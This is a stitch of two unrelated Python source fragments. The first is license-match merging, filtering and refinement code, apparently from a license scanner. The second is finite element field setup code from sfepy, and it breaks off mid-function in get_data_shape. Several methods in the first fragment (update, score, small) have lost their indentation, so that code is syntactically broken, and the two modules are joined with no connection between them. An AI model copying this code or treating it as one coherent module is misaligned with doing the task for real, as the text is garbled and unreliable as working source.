        return self.ispan.is_after(other.ispan)
    def is_after(self, other):
        """
        Return True if this match spans are strictly after other match spans.
        """
        return self.is_qafter(other) and self.is_iafter(other)
    def subtract(self, other):
        """
        Subtract an other match from this match by removing overlapping span
        items present in both matches from this match.
        """
        self.qspan.difference_update(other.qspan)
        self.ispan.difference_update(other.ispan)
        return self
    @staticmethod
    def merge(matches, max_dist=MAX_DIST):
        """
        Merge overlapping, touching or close-by matches in the given iterable of
        matches. Return a new list of merged matches if they can be merged.
        Matches that cannot be merged are returned as-is.
        Only matches for the same rules can be merged.
        The overlap and touch is considered using both the qspan and ispan.
        The maximal merge is always returned and eventually a single match per
        rule is returned if all matches for that rule can be merged.
        For being merged two matches must also be in increasing query and index positions.
        """
        # FIXME: longer and denser matches starting at the same qspan should
        # be sorted first
        # only merge matches with the same licensing_identifier
        # iterate on matches grouped by licensing_identifier, one licensing_identifier at a time.
        # we divide by ROUNDING with an integer division to round values in coarse bands
        sorter = lambda m: (m.rule.licensing_identifier, m.qspan.start , -m.qlen(), -m.ilen())
        matches = sorted(matches, key=sorter)
        merged = []
        for _rid, rule_matches in groupby(matches, key=lambda m: m.rule.licensing_identifier):
            rule_matches = list(rule_matches)
            i = 0
            if TRACE_MERGE:
                logger_debug('merge_match: processing rule:', rule_matches[0].rule.identifier)
            # compare two matches in the sorted sequence: current_match and the next one
            while i < len(rule_matches) - 1:
                current_match = rule_matches[i]
                j = i + 1
                if TRACE_MERGE: logger_debug('merge_match: current_match:', current_match)
                while j < len(rule_matches):
                    next_match = rule_matches[j]
                    if TRACE_MERGE: logger_debug(' merge_match: next_match:', next_match)
                    # too far apart in either the query or the index: stop
                    # scanning this group for the current match
                    if next_match.qdistance_to(current_match) >= max_dist or next_match.idistance_to(current_match) >= max_dist:
                        break
                    # remove surrounded matches
                    if current_match.qsurround(next_match):
                        # NOTE(review): a surrounded next_match is dropped
                        # without folding its spans in (update is commented
                        # out) — confirm this is intended.
                        # current_match.update(next_match)
                        if TRACE_MERGE: logger_debug(' ==> NEW MERGED 1:', current_match)
                        if TRACE_MERGE_TEXTS: print('MERGE ==> surround:\n',
                                                    current_match, '\n', get_match_itext(current_match),
                                                    '\nnext:\n', get_match_itext(next_match))
                        del rule_matches[j]
                    # next_match is strictly in increasing sequence and within distance
                    # and same rule
                    elif (next_match.is_after(current_match)
                          and current_match.rule == next_match.rule
                          and next_match.qdistance_to(current_match) < max_dist
                          and next_match.idistance_to(current_match) < max_dist):
                        current_match.update(next_match)
                        if TRACE_MERGE: logger_debug(' ==> NEW MERGED 2:', current_match)
                        if TRACE_MERGE_TEXTS: print('MERGE ==> increasing within dist\n',
                                                    current_match, '\n', get_match_itext(current_match),
                                                    '\nnext:\n', get_match_itext(next_match))
                        del rule_matches[j]
                    else:
                        j += 1
                i += 1
            merged.extend(rule_matches)
        return merged
    def combine(self, other):
        """
        Return a new LicenseMatch combining self and the `other` match: the
        qspan, ispan and hispan are unioned, line mappings merged and matcher
        strings accumulated. Raise TypeError if the matches have neither the
        same rule nor the same licensing.
        """
        same_rule = self.rule == other.rule
        # FIXME: we may be combining apples and oranges by considering same licensing too!
        same_licensing = self.same_licensing(other)
        if not (same_rule or same_licensing):
            raise TypeError('Cannot combine matches with different rules or licensing: from: %(self)r, to: %(other)r' % locals())
        # accumulate the matcher strings of both matches, avoiding repeats
        if other.matcher not in self.matcher:
            newmatcher = ' '.join([self.matcher, other.matcher])
        else:
            newmatcher = self.matcher
        # merge the query position -> line number mappings
        line_by_pos = dict(self.line_by_pos)
        line_by_pos.update(other.line_by_pos)
        combined = LicenseMatch(rule=self.rule,
                                qspan=Span(self.qspan | other.qspan),
                                ispan=Span(self.ispan | other.ispan),
                                hispan=Span(self.hispan | other.hispan),
                                line_by_pos=line_by_pos,
                                query_run_start=min(self.query_run_start, other.query_run_start),
                                matcher=newmatcher)
        return combined
def update(self, other):
"""
Update self with other match and return self.
"""
combined = self.combine(other)
self.qspan = combined.qspan
self.ispan = combined.ispan
self.hispan = combined.hispan
self.line_by_pos = combined.line_by_pos
self.matcher = combined.matcher
self.query_run_start = min(self.query_run_start, other.query_run_start)
return self
    def rebase(self, new_query_start, new_query_end, line_by_pos, matcher):
        """
        Return a copy of this match with a new qspan and new line_by_pos and
        updating the matcher of match as needed.
        """
        # shift the existing qspan by the offset between the new query start
        # and the current query run start (presumably preserving any holes in
        # the span — see Span.rebase)
        offset = new_query_start - self.query_run_start
        return LicenseMatch(
            rule=self.rule,
            qspan=self.qspan.rebase(offset),
            ispan=Span(self.ispan),
            hispan=Span(self.hispan),
            line_by_pos=line_by_pos,
            query_run_start=new_query_start,
            # strip any cached-match marker before appending the new matcher tag
            matcher=' '.join([self.matcher.replace(cache.MATCH_TYPE, '').strip(), matcher]),
        )
def score(self):
"""
Return the score for this match as a float between 0 and 100.
This is a ratio of matched tokens to the rule length.
"""
# TODO: compute a better score based tf/idf, BM25, applying ratio to low tokens, etc
if not self.rule.length:
return 0
score = self.ilen() / self.rule.length
return round(score * 100, 2)
def small(self):
"""
Return True if this match is "small" based on its rule thresholds.
"""
thresholds = self.rule.thresholds()
min_ihigh = thresholds.min_high
min_ilen = thresholds.min_len
hilen = self.hilen()
ilen = self.ilen()
if TRACE_REFINE_SMALL:
logger_debug('LicenseMatch.small(): hilen=%(hilen)r < min_ihigh=%(min_ihigh)r or ilen=%(ilen)r < min_ilen=%(min_ilen)r : thresholds=%(thresholds)r' % locals(),)
if thresholds.small and self.score() < 50 and (hilen < min_ihigh or ilen < min_ilen):
return True
if hilen < min_ihigh or ilen < min_ilen:
return True
    def false_positive(self, idx):
        """
        Return a false positive rule id if the LicenseMatch match is a false
        positive or None otherwise (nb: not False).
        Lookup the matched tokens sequence against the idx index.
        """
        ilen = self.ilen()
        # false positive rules are short: bail out early on longer matches
        if ilen > idx.largest_false_positive_length:
            return
        rule_tokens = idx.tids_by_rid[self.rule.rid]
        ispan = self.ispan
        matched_itokens = array('h', (tid for ipos, tid in enumerate(rule_tokens) if ipos in ispan))
        # note: hash computation is inlined here but MUST be the same code as in match_hash
        # NOTE(review): array.tostring() is the Python 2 spelling; it was
        # removed in Python 3.9 in favor of tobytes() — revisit on a port.
        matched_hash = md5(matched_itokens.tostring()).digest()
        return idx.false_positive_rid_by_hash.get(matched_hash)
def filter_matches(matches):
    """
    Return a filtered list of LicenseMatch given a `matches` list of
    LicenseMatch by removing duplicated or superfluous matches based on matched
    positions relation such as sequence, containment, touch, overlap, same
    licensing.
    Matches that are entirely contained in another bigger match are removed.
    When more than one matched position matches the same license(s), only one
    match of this set is kept.
    Return a two-tuple of (kept matches, discarded matches) lists.
    """
    # sort by coarse start band, then longer and denser matches first
    matches = sorted(matches, key=lambda m: (m.qstart // ROUNDING, -m.qlen(), -m.ilen()))
    if TRACE_FILTER: print('filter_matches: number of matches to process:', len(matches))
    discarded = []
    # compare two matches in the sorted sequence: current_match and the next one
    i = 0
    while i < len(matches) - 1:
        current_match = matches[i]
        j = i + 1
        while j < len(matches):
            next_match = matches[j]
            if TRACE_FILTER: print('filter_match: current_match:', current_match)
            if TRACE_FILTER: print(' filter_match: next_match:', next_match)
            # Skip qcontained, irrespective of licensing
            # FIXME: by construction this CANNOT happen
            if current_match.contains_qspan(next_match):
                if TRACE_FILTER: print(' filter_matches: next_match in current_match')
                del matches[j]
                continue
            if current_match.qsurround(next_match):
                # Skip if next match is surrounded and has same of licensing
                if current_match.same_licensing(next_match):
                    if TRACE_FILTER: print(' filter_matches: next_match in current_match region and same licensing')
                    del matches[j]
                    continue
                if current_match.qlen() > (next_match.qlen() * 2):
                    # Skip if next match is surrounded and is much smaller than current
                    if TRACE_FILTER: print(' filter_matches: remove surrounding with much bigger match')
                    del matches[j]
                    continue
            # the next_match has some region overlap
            if current_match.qstart < next_match.qstart and current_match.qend < next_match.qend:
                # compute region overlap
                overlapping = [p for p in next_match.qspan if p < current_match.qend]
                overlap = len(overlapping)
                # over 50 % of overlap: discard
                if overlap > (len(next_match.qspan) / 2):
                    if TRACE_FILTER: print(' filter_matches: remove partially overlapping with much bigger match')
                    # NOTE(review): this assignment looks like a no-op since
                    # current_match was read from matches[i] and i is unchanged
                    matches[i] = current_match
                    discarded.append(matches[j])
                    del matches[j]
                    continue
            j += 1
        i += 1
    # FIXME: returned discarded too
    return matches, discarded
def filter_low_score(matches, min_score=100):
    """
    Split `matches` into a two-tuple of (kept, discarded) lists where kept
    matches score at least `min_score`. When `min_score` is zero or falsy,
    all matches are kept and nothing is discarded.
    """
    if not min_score:
        return matches, []
    kept = []
    discarded = []
    for candidate in matches:
        target = kept if candidate.score() >= min_score else discarded
        target.append(candidate)
    return kept, discarded
def filter_short_matches(matches):
    """
    Split `matches` into a two-tuple of (kept, discarded) lists where the
    discarded matches are "small" per their rule thresholds.
    """
    kept = []
    discarded = []
    for candidate in matches:
        if candidate.small():
            if TRACE_REFINE_SMALL: logger_debug('DISCARDING SHORT:', candidate)
            discarded.append(candidate)
            continue
        if TRACE_REFINE_SMALL: logger_debug(' ===> NOT DISCARDING SHORT:', candidate)
        kept.append(candidate)
    return kept, discarded
def filter_spurious_matches(matches):
    """
    Split `matches` into a two-tuple of (kept, discarded) lists where the
    discarded matches are spurious: short, with few "high" tokens and a
    sparse (low density) qspan or ispan.
    """
    kept = []
    discarded = []
    for candidate in matches:
        qdensity = candidate.qspan.density()
        idensity = candidate.ispan.density()
        is_short = candidate.ilen() < 20 and candidate.hilen() < 5
        if is_short and (qdensity < 0.3 or idensity < 0.3):
            if TRACE_REFINE: logger_debug('DISCARDING Spurrious:', candidate)
            discarded.append(candidate)
        else:
            kept.append(candidate)
    return kept, discarded
def filter_false_positive_matches(idx, matches):
    """
    Split `matches` into a two-tuple of (kept, discarded) lists where the
    discarded matches are known false positives in the `idx` index.
    """
    kept = []
    discarded = []
    for candidate in matches:
        fp_rid = candidate.false_positive(idx)
        is_false_positive = fp_rid is not None
        if not is_false_positive:
            if TRACE_REFINE: logger_debug('NOT DISCARDING FALSE POSITIVE:', candidate)
            kept.append(candidate)
        else:
            if TRACE_REFINE: logger_debug('DISCARDING FALSE POSITIVE:', candidate, 'fp rule:', idx.rules_by_rid[fp_rid].identifier)
            discarded.append(candidate)
    return kept, discarded
def refine_matches(matches, idx, min_score=0, max_dist=MAX_DIST):
    """
    Return two sequences of matches: one contains refined good matches, and the
    other contains matches that were filtered out.

    Discard small, false positive, spurious and (when `min_score` is set)
    low-scoring matches; merge the survivors when they are within `max_dist`
    of each other.
    """
    if TRACE: logger_debug()
    if TRACE: logger_debug(' #####refine_matches: START matches#', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    all_discarded = []
    matches, discarded = filter_short_matches(matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' #####refine_matches: NOT SHORT #', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: SHORT discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    matches, discarded = filter_false_positive_matches(idx, matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' #####refine_matches: NOT FALSE POS #', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: FALSE POS discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    matches, discarded = filter_spurious_matches(matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' #####refine_matches: NOT SPURIOUS#', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: SPURIOUS discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    matches = LicenseMatch.merge(matches, max_dist=max_dist)
    # FIX: guard debug logging with TRACE for consistency with every other
    # call here (logger_debug is a no-op unless TRACE is enabled anyway)
    if TRACE: logger_debug(' ##### refine_matches: MERGED_matches#:', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    matches, discarded = filter_matches(matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' ##### refine_matches: NOT FILTERED matches#:', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: FILTERED discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    if min_score:
        matches, discarded = filter_low_score(matches, min_score=min_score)
        all_discarded.extend(discarded)
        if TRACE: logger_debug(' #####refine_matches: NOT LOW SCORE #', len(matches))
        if TRACE_REFINE: map(logger_debug, matches)
        if TRACE: logger_debug(' ###refine_matches: LOW SCORE discarded #:', len(discarded))
        if TRACE_REFINE: map(logger_debug, discarded)
    matches = LicenseMatch.merge(matches, max_dist=max_dist)
    if TRACE: logger_debug(' ##### refine_matches: FINAL MERGED_matches#:', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    return matches, all_discarded
def get_texts(match, location=None, query_string=None, idx=None, width=120):
    """
    Return a two-tuple of wrapped texts at `width` for a `match` and a query
    `location` or `query_string`:
    - the matched query text as a string.
    - the matched rule text as a string.
    Unmatched positions are represented as <no-match> and rule gaps as <gap>.
    Punctuation is removed, spaces are normalized (a new line is replaced by
    a space) and case is preserved. If `width` is greater than zero, the
    texts are wrapped to that width.
    Used primarily to recover the matched texts for testing or reporting.
    """
    assert idx
    qtext = get_matched_qtext(match, location, query_string, idx, width)
    itext = get_match_itext(match, width)
    return qtext, itext
def get_matched_qtext(match, location=None, query_string=None, idx=None, width=120):
    """
    Return the matched query text of `match` as a string wrapped at `width`,
    given a query file `location` or a `query_string` and an index `idx`.
    Unmatched positions are represented as <no-match>.
    Punctuation is removed, spaces are normalized (a new line is replaced by
    a space) and case is preserved. If `width` is greater than zero, the
    text is wrapped to that width.
    Used primarily to recover the matched texts for testing or reporting.
    """
    assert idx
    return format_text(
        matched_query_tokens_str(match, location, query_string, idx), width)
def get_match_itext(match, width=120):
    """
    Return the matched rule text of `match` as a string wrapped at `width`.
    Unmatched positions inside a matched region are represented as
    <no-match> and rule gaps as <gap>.
    Punctuation is removed, spaces are normalized (a new line is replaced by
    a space) and case is preserved. If `width` is greater than zero, the
    text is wrapped to that width.
    Used primarily to recover the matched texts for testing or reporting.
    """
    rule_tokens = matched_rule_tokens_str(match)
    return format_text(rule_tokens, width)
def format_text(tokens, width=120, no_match='<no-match>'):
    """
    Return a formatted text wrapped at `width` given an iterable of tokens.
    None (or empty) tokens standing for unmatched positions are replaced
    with the `no_match` marker. If `width` is zero, no wrapping is applied.
    """
    # Substitute the marker for falsy tokens, then build a single line.
    line = u' '.join(tok or no_match for tok in tokens)
    if not width:
        return line
    return u'\n'.join(textwrap.wrap(line, width=width, break_on_hyphens=False))
def matched_query_tokens_str(match, location=None, query_string=None, idx=None):
    """
    Return an iterable of matched query token strings given a query file at
    `location` or a `query_string`, a match and an index. Yield None for
    unmatched positions.
    Punctuation is removed , spaces are normalized (new line is replaced by a
    space), case is preserved.
    Used primarily to recover the matched texts for testing or reporting.
    """
    assert idx
    dictionary_get = idx.dictionary.get
    # Re-tokenize the query the same way as during matching, but keep the
    # original case for display; lookups below lowercase each token.
    tokens = (query.query_tokenizer(line, lower=False)
              for line in query.query_lines(location, query_string))
    tokens = chain.from_iterable(tokens)
    match_qspan = match.qspan
    match_qspan_start = match_qspan.start
    match_qspan_end = match_qspan.end
    # known_pos tracks positions of tokens known to the index only:
    # unknown tokens do not advance query positions.
    known_pos = -1
    started = False
    finished = False
    for token in tokens:
        token_id = dictionary_get(token.lower())
        if token_id is None:
            # Unknown token: skip entirely before the matched region and
            # stop iterating once the region has been passed.
            if not started:
                continue
            if finished:
                break
        else:
            known_pos += 1
            if match_qspan_start <= known_pos <= match_qspan_end:
                started = True
            if known_pos == match_qspan_end:
                finished = True
        # NOTE(review): known tokens before the span start (and after its
        # end, until an unknown token triggers the break above) fall
        # through here and yield None -- presumably rendered as <no-match>
        # context by format_text(); confirm this is intended.
        if known_pos in match_qspan and token_id is not None:
            yield token
        else:
            yield None
def matched_rule_tokens_str(match, gap='<gap>'):
    """
    Yield the matched rule token strings of `match`, None for unmatched
    positions inside the matched region, and the `gap` marker string at
    rule gap positions.
    Punctuation is removed, spaces are normalized (a new line is replaced by
    a space) and case is preserved.
    Used primarily to recover the matched texts for testing or reporting.
    """
    ispan = match.ispan
    ispan_start = ispan.start
    ispan_end = ispan.end
    rule_gaps = match.rule.gaps
    for pos, token in enumerate(match.rule.tokens(lower=False)):
        # Only positions inside the matched region bounds are reported.
        if ispan_start <= pos <= ispan_end:
            yield token if pos in ispan else None
            if rule_gaps and pos in rule_gaps:
                yield gap
|
"""
Notes
-----
Important attributes of continuous (order > 0) :class:`Field` and
:class:`SurfaceField` instances:
- `vertex_remap` : `econn[:, :n_vertex] = vertex_remap[conn]`
- `vertex_remap_i` : `conn = vertex_remap_i[econn[:, :n_vertex]]`
where `conn` is the mesh vertex connectivity, `econn` is the
region-local field connectivity.
"""
from __future__ import absolute_import
import numpy as nm
from sfepy.base.base import output, get_default, assert_
from sfepy.base.base import Struct
from sfepy.base.timing import Timer
from sfepy.discrete.common.fields import parse_shape, Field
from sfepy.discrete.fem.mesh import Mesh
from sfepy.discrete.fem.meshio import convert_complex_output
from sfepy.discrete.fem.utils import (extend_cell_data, prepare_remap,
invert_remap, get_min_value)
from sfepy.discrete.fem.mappings import VolumeMapping, SurfaceMapping
from sfepy.discrete.fem.poly_spaces import PolySpace
from sfepy.discrete.fem.fe_surface import FESurface
from sfepy.discrete.integrals import Integral
from sfepy.discrete.fem.linearizer import (get_eval_dofs, get_eval_coors,
create_output)
import six
def set_mesh_coors(domain, fields, coors, update_fields=False, actual=False,
                   clear_all=True, extra_dofs=False):
    """
    Update the mesh coordinates of `domain` from `coors` - the actual
    coordinates when `actual` is True, the cmesh coordinates otherwise.
    When `update_fields` is True, also propagate the new coordinates to
    every field in `fields` and clear its reference mappings.
    """
    n_nod = domain.mesh.n_nod
    if actual:
        # Lazily allocate the actual-coordinates array on first use.
        if not hasattr(domain.mesh, 'coors_act'):
            domain.mesh.coors_act = nm.zeros_like(domain.mesh.coors)
        domain.mesh.coors_act[:] = coors[:n_nod]
    else:
        domain.cmesh.coors[:] = coors[:n_nod]
    if update_fields:
        for field in six.itervalues(fields):
            field.set_coors(coors, extra_dofs=extra_dofs)
            field.clear_mappings(clear_all=clear_all)
def eval_nodal_coors(coors, mesh_coors, region, poly_space, geom_poly_space,
                     econn, only_extra=True):
    """
    Compute coordinates of nodes corresponding to `poly_space`, given
    mesh coordinates and `geom_poly_space`.

    Parameters
    ----------
    coors : array
        The node coordinates array, modified in-place at rows addressed
        by `econn`.
    mesh_coors : array
        The mesh (vertex) coordinates.
    region : Region
        The region defining the cells and their vertex connectivity.
    poly_space : PolySpace instance
        The polynomial space whose node coordinates are evaluated.
    geom_poly_space : PolySpace instance
        The geometry interpolation polynomial space.
    econn : array
        The extended DOF connectivity of the cells.
    only_extra : bool
        If True, compute only the extra (non-vertex) node coordinates.
    """
    if only_extra:
        # Select extra nodes only: rows of poly_space.nts with a nonzero
        # first entry -- presumably non-vertex node types; confirm against
        # PolySpace node type conventions.
        iex = (poly_space.nts[:,0] > 0).nonzero()[0]
        if iex.shape[0] == 0: return
        qp_coors = poly_space.node_coors[iex, :]
        econn = econn[:, iex].copy()
    else:
        qp_coors = poly_space.node_coors
    ##
    # Evaluate geometry interpolation base functions in (extra) nodes.
    bf = geom_poly_space.eval_base(qp_coors)
    bf = bf[:,0,:].copy()
    ##
    # Evaluate extra coordinates with 'bf'.
    cmesh = region.domain.cmesh
    # Cell-vertex connectivity, reshaped to (n_cell, n_cell_vertices).
    conn = cmesh.get_incident(0, region.cells, region.tdim)
    conn.shape = (econn.shape[0], -1)
    # (n_point, n_cell, dim) -> store per cell via swapped axes.
    ecoors = nm.dot(bf, mesh_coors[conn])
    coors[econn] = nm.swapaxes(ecoors, 0, 1)
def _interp_to_faces(vertex_vals, bfs, faces):
dim = vertex_vals.shape[1]
n_face = faces.shape[0]
n_qp = bfs.shape[0]
faces_vals = nm.zeros((n_face, n_qp, dim), nm.float64)
for ii, face in enumerate(faces):
vals = vertex_vals[face,:dim]
faces_vals[ii,:,:] = nm.dot(bfs[:,0,:], vals)
return(faces_vals)
def get_eval_expression(expression,
                        fields, materials, variables,
                        functions=None, mode='eval', term_mode=None,
                        extra_args=None, verbose=True, kwargs=None):
    """
    Return a callable evaluating `expression` in the given elements and
    reference element coordinates.
    """
    from sfepy.discrete.evaluate import eval_in_els_and_qp

    def evaluator(iels, coors):
        # Evaluate and strip the trailing (single-component) axis.
        values = eval_in_els_and_qp(expression, iels, coors,
                                    fields, materials, variables,
                                    functions=functions, mode=mode,
                                    term_mode=term_mode,
                                    extra_args=extra_args, verbose=verbose,
                                    kwargs=kwargs)
        return values[..., 0]

    return evaluator
def create_expression_output(expression, name, primary_field_name,
                             fields, materials, variables,
                             functions=None, mode='eval', term_mode=None,
                             extra_args=None, verbose=True, kwargs=None,
                             min_level=0, max_level=1, eps=1e-4):
    """
    Create output mesh and data for the expression using the adaptive
    linearizer.

    Parameters
    ----------
    expression : str
        The expression to evaluate.
    name : str
        The name of the data.
    primary_field_name : str
        The name of field that defines the element groups and polynomial
        spaces.
    fields : dict
        The dictionary of fields used in `variables`.
    materials : Materials instance
        The materials used in the expression.
    variables : Variables instance
        The variables used in the expression.
    functions : Functions instance, optional
        The user functions for materials etc.
    mode : one of 'eval', 'el_avg', 'qp'
        The evaluation mode - 'qp' requests the values in quadrature points,
        'el_avg' element averages and 'eval' means integration over
        each term region.
    term_mode : str
        The term call mode - some terms support different call modes
        and depending on the call mode different values are
        returned.
    extra_args : dict, optional
        Extra arguments to be passed to terms in the expression.
    verbose : bool
        If False, reduce verbosity.
    kwargs : dict, optional
        The variables (dictionary of (variable name) : (Variable
        instance)) to be used in the expression.
    min_level : int
        The minimum required level of mesh refinement.
    max_level : int
        The maximum level of mesh refinement.
    eps : float
        The relative tolerance parameter of mesh adaptivity.

    Returns
    -------
    out : dict
        The output dictionary.
    """
    field = fields[primary_field_name]
    ps = field.poly_space
    gps = field.gel.poly_space
    # Vertex-only coordinates and connectivity drive the linearizer.
    vertex_coors = field.coors[:field.n_vertex_dof, :]
    vertex_conn = field.econn[:, :field.gel.n_vertex]
    eval_dofs = get_eval_expression(expression,
                                    fields, materials, variables,
                                    functions=functions,
                                    mode=mode, extra_args=extra_args,
                                    verbose=verbose, kwargs=kwargs)
    eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)
    (level, coors, conn,
     vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
                                     vertex_conn.shape[0], ps,
                                     min_level=min_level,
                                     max_level=max_level, eps=eps)
    mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
                          field.domain.mesh.descs)
    out = {name: Struct(name='output_data', mode='vertex',
                        data=vdofs, var_name=name, dofs=None,
                        mesh=mesh, level=level)}
    return convert_complex_output(out)
class FEField(Field):
    """
    Base class for finite element fields.
    Notes
    -----
    - interps and hence node_descs are per region (must have single
      geometry!)
    Field shape information:
    - ``shape`` - the shape of the base functions in a point
    - ``n_components`` - the number of DOFs per FE node
    - ``val_shape`` - the shape of field value (the product of DOFs and
      base functions) in a point
    """
    def __init__(self, name, dtype, shape, region, approx_order=1):
        """
        Create a finite element field.
        Parameters
        ----------
        name : str
            The field name.
        dtype : numpy.dtype
            The field data type: float64 or complex128.
        shape : int/tuple/str
            The field shape: 1 or (1,) or 'scalar', space dimension (2, or (2,)
            or 3 or (3,)) or 'vector', or a tuple. The field shape determines
            the shape of the FE base functions and is related to the number of
            components of variables and to the DOF per node count, depending
            on the field kind.
        region : Region
            The region where the field is defined.
        approx_order : int or tuple
            The FE approximation order. The tuple form is (order, has_bubble),
            e.g. (1, True) means order 1 with a bubble function.
        Notes
        -----
        Assumes one cell type for the whole region!
        """
        shape = parse_shape(shape, region.domain.shape.dim)
        if not self._check_region(region):
            raise ValueError('unsuitable region for field %s! (%s)' %
                             (name, region.name))
        Struct.__init__(self, name=name, dtype=dtype, shape=shape,
                        region=region)
        self.domain = self.region.domain
        self._set_approx_order(approx_order)
        # The following setup methods are implemented in subclasses.
        self._setup_geometry()
        self._setup_kind()
        self._setup_shape()
        self.surface_data = {}
        self.point_data = {}
        # Basis orientation data passed to PolySpace.eval_base(); None
        # unless set by a subclass (hierarchical bases).
        self.ori = None
        self._create_interpolant()
        self._setup_global_base()
        self.setup_coors()
        self.clear_mappings(clear_all=True)
        self.clear_qp_base()
        self.basis_transform = None
        self.econn0 = None
        self.unused_dofs = None
        self.stored_subs = None
    def _set_approx_order(self, approx_order):
        """
        Set a uniform approximation order.
        """
        if isinstance(approx_order, tuple):
            # (order, has_bubble) form.
            self.approx_order = approx_order[0]
            self.force_bubble = approx_order[1]
        else:
            self.approx_order = approx_order
            self.force_bubble = False
    def get_true_order(self):
        """
        Get the true approximation order depending on the reference
        element geometry.
        For example, for P1 (linear) approximation the true order is 1,
        while for Q1 (bilinear) approximation in 2D the true order is 2.
        """
        gel = self.gel
        if (gel.dim + 1) == gel.n_vertex:
            # Simplex geometry (P-type basis).
            order = self.approx_order
        else:
            # Tensor-product geometry (Q-type basis).
            order = gel.dim * self.approx_order
        if self.force_bubble:
            bubble_order = gel.dim + 1
            order = max(order, bubble_order)
        return order
    def is_higher_order(self):
        """
        Return True, if the field's approximation order is greater than one.
        """
        return self.force_bubble or (self.approx_order > 1)
    def _setup_global_base(self):
        """
        Setup global DOF/base functions, their indices and connectivity of the
        field. Called methods implemented in subclasses.
        """
        self._setup_facet_orientations()
        self._init_econn()
        self.n_vertex_dof, self.vertex_remap = self._setup_vertex_dofs()
        self.vertex_remap_i = invert_remap(self.vertex_remap)
        aux = self._setup_edge_dofs()
        self.n_edge_dof, self.edge_dofs, self.edge_remap = aux
        aux = self._setup_face_dofs()
        self.n_face_dof, self.face_dofs, self.face_remap = aux
        aux = self._setup_bubble_dofs()
        self.n_bubble_dof, self.bubble_dofs, self.bubble_remap = aux
        # Total DOF count of the field.
        self.n_nod = self.n_vertex_dof + self.n_edge_dof \
                     + self.n_face_dof + self.n_bubble_dof
        self._setup_esurface()
    def _setup_esurface(self):
        """
        Setup extended surface entities (edges in 2D, faces in 3D),
        i.e. indices of surface entities into the extended connectivity.
        """
        node_desc = self.node_desc
        gel = self.gel
        self.efaces = gel.get_surface_entities().copy()
        nd = node_desc.edge
        if nd is not None:
            # Append edge node indices of each face.
            efs = []
            for eof in gel.get_edges_per_face():
                efs.append(nm.concatenate([nd[ie] for ie in eof]))
            efs = nm.array(efs).squeeze()
            if efs.ndim < 2:
                efs = efs[:,nm.newaxis]
            self.efaces = nm.hstack((self.efaces, efs))
        efs = node_desc.face
        if efs is not None:
            # Append face node indices.
            efs = nm.array(efs).squeeze()
            if efs.ndim < 2:
                efs = efs[:,nm.newaxis]
            self.efaces = nm.hstack((self.efaces, efs))
        if gel.dim == 3:
            # Extended edges exist in 3D only.
            self.eedges = gel.edges.copy()
            efs = node_desc.edge
            if efs is not None:
                efs = nm.array(efs).squeeze()
                if efs.ndim < 2:
                    efs = efs[:,nm.newaxis]
                self.eedges = nm.hstack((self.eedges, efs))
    def set_coors(self, coors, extra_dofs=False):
        """
        Set coordinates of field nodes.
        """
        # Mesh vertex nodes.
        if self.n_vertex_dof:
            indx = self.vertex_remap_i
            self.coors[:self.n_vertex_dof] = nm.take(coors,
                                                     indx.astype(nm.int32),
                                                     axis=0)
        n_ex_dof = self.n_bubble_dof + self.n_edge_dof + self.n_face_dof
        # extra nodes
        if n_ex_dof:
            if extra_dofs:
                # `coors` already contains the extra node coordinates.
                if self.n_nod != coors.shape[0]:
                    raise NotImplementedError
                self.coors[:] = coors
            else:
                # Interpolate extra node coordinates from vertex ones.
                gps = self.gel.poly_space
                ps = self.poly_space
                eval_nodal_coors(self.coors, coors, self.region,
                                 ps, gps, self.econn)
    def setup_coors(self):
        """
        Setup coordinates of field nodes.
        """
        mesh = self.domain.mesh
        self.coors = nm.empty((self.n_nod, mesh.dim), nm.float64)
        self.set_coors(mesh.coors)
    def get_vertices(self):
        """
        Return indices of vertices belonging to the field region.
        """
        return self.vertex_remap_i
    def _get_facet_dofs(self, rfacets, remap, dofs):
        """
        Return the DOFs in `dofs` of the facets `rfacets` remapped by
        `remap`, skipping facets remapped to negative values (facets
        outside the field region).
        """
        facets = remap[rfacets]
        return dofs[facets[facets >= 0]].ravel()
    def get_data_shape(self, integral, integration='volume', region_name=None):
        """
        Get element data dimensions.
        Parameters
        ----------
        integral : Integral instance
            The integral describing used numerical quadrature.
        integration : 'volume', 'surface', 'surface_extra', 'point' or 'custom'
            The term integration type.
        region_name : str
            The name of the region of the integral.
        Returns
        -------
        data_shape : 4 ints
            The `(n_el, n_qp, dim, n_en)` for volume shape kind,
            `(n_fa, n_qp, dim, n_fn)` for surface shape kind and
            `(n_nod, 0, 0, 1)` for point shape kind.
        Notes
        -----
        - `n_el`, `n_fa` = number of elements/facets
        - `n_qp` = number of quadrature points per element/facet
        - `dim` = spatial dimension
        - `n_en`, `n_fn` = number of element/facet nodes
        - `n_nod` = number of element nodes
        """
        region = self.domain.regions[region_name]
        shape = region.shape
        dim = region.dim
        if integration in ('surface', 'surface_extra'):
            sd = self.surface_data[region_name]
            # This works also for surface fields.
            key = sd.face_type
            weights = self.get_qp(key, integral).weights
            n_qp = weights.shape[0]
            if integration == 'surface':
                data_shape = (sd.n_fa, n_qp, dim, sd.n_fp)
            else:
                # 'surface_extra' uses the full cell connectivity.
                data_shape = (sd.n_fa, n_qp, dim, self.econn.shape[1])
        elif integration in ('volume', 'custom'):
            _, weights = integral.get_qp(self.gel.name)
            n_qp = weights.shape[0]
